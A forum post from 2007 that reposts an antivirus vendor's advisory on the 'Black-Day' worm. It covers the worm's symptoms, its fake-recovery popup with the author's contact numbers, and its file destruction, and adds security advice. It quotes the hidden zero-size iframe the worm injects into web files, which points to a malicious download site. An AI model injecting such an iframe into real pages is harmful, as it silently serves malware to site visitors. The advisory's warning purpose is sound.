我来我网
https://5come5.cn
 
您尚未 登录  注册 | 菠菜 | 软件站 | 音乐站 | 邮箱1 | 邮箱2 | 风格选择 | 更多 » 
 

本页主题: 最新病毒 黑bomb 显示签名 | 打印 | 加为IE收藏 | 收藏主题 | 上一主题 | 下一主题

五栋楼



性别: 帅哥 状态: 该用户目前不在线
头衔: hspidence
等级: 人见人爱
家族: 跑跑UesTc家族
发贴: 2611
威望: 0
浮云: 2672
在线等级:
注册时间: 2006-09-12
最后登陆: 2012-08-25

5come5帮你背单词 [ october /ok'təubə/ n. 十月 ]


最新病毒 黑bomb

仿佛破坏力不是很大,但是恢复比较困难,以下是我转载瑞星的关于这个病毒的细节,对于解决方法,瑞星只说了用他的软件,有打广告的嫌疑
此程序为Worm类型程序, 这是一个采用Dehlip编写的蠕虫病毒。

    1、中毒后的现像:

    <1>被感染的程序所有的图标会变成一个黑bomb的图标。

    <2>病毒作者在被感染后的文件激活该蠕虫时会弹出一个对话框,内容如下;意思是告诉用户你的电脑已感染病毒,如果想要恢复数据,请联系QQ5188340,87408749,76665639,其实被感染的文件已经被病毒完全破坏导致无法恢复。
By : wswhacker
Hi,Friend:
Your computer were infect my worm!
And if you want to clear this worm
Please add my QQ Num:5188340,87408749,76665639
The worm Name:Black-Day
Powered by :wswhacker

    2、破坏行为:

    <1>感染网页相关文件。

    该蠕虫会感染D盘到Z盘上的.asp|.htm|.html|.aspx|.PHP|.JSP文件。在原文件最后插入一个Iframe标签,使用户不知不觉中访问恶意站点。Iframe标签的内容如下:

    <iframe src='http://www.dadayouxi.net/Black-Day.htm' width=0 height=0></iframe>其中,http://www.dadayouxi.net网站含有恶意代码,当你打开该网页时,该蠕虫已经被下载到本地计算机并尝试运行。如果你电脑上装有卡卡上网助手的话,当你打开该网页时,会被卡卡助手自动拦截。

    <2>破坏文件

    该蠕虫会把D盘到Z盘上所有的小于自身文件长度的文件删除,然后把自己伪装成目标文件。对于大于自身文件长度的文件,该蠕虫将用自己的文件内容覆盖目标文件,目标文件长度不发生改变。被破坏的文件的文件名不会发生改变。

安全建议:

    1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。

    2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。

    3 不浏览不良网站,不随意下载安装可疑插件。

    4 不接收QQ、MSN、Emial等传来的可疑文件。

    5 上网时打开杀毒软件实时监控功能。

    6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。

清除办法:

    瑞星杀毒软件清除办法:

    安装瑞星杀毒软件,升级到19.18.40版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。





大家注意预防一下下
本帖最近评分记录:
  • 浮云:5(chaochaohan) 谢谢提醒
  • 顶端 Posted: 2007-12-10 22:32 | [楼 主]
    五栋楼



    性别: 帅哥 状态: 该用户目前不在线
    头衔: hspidence
    等级: 人见人爱
    家族: 跑跑UesTc家族
    发贴: 2611
    威望: 0
    浮云: 2672
    在线等级:
    注册时间: 2006-09-12
    最后登陆: 2012-08-25

    5come5帮你背单词 [ scheme /ski:m/ n. 计划,方案,阴谋,诡计;v. 计划,图谋 ]


    就是,,估计上了恶意网站以后,病毒也是不请自来了
    顶端 Posted: 2007-12-10 23:01 | [1 楼]
    我来我网·5come5 Forum » 电脑F.A.Q.

    Total 0.009624(s) query 6, Time now is:11-27 08:40, Gzip enabled
    Powered by PHPWind v5.3, Localized by 5come5 Tech Team, 黔ICP备16009856号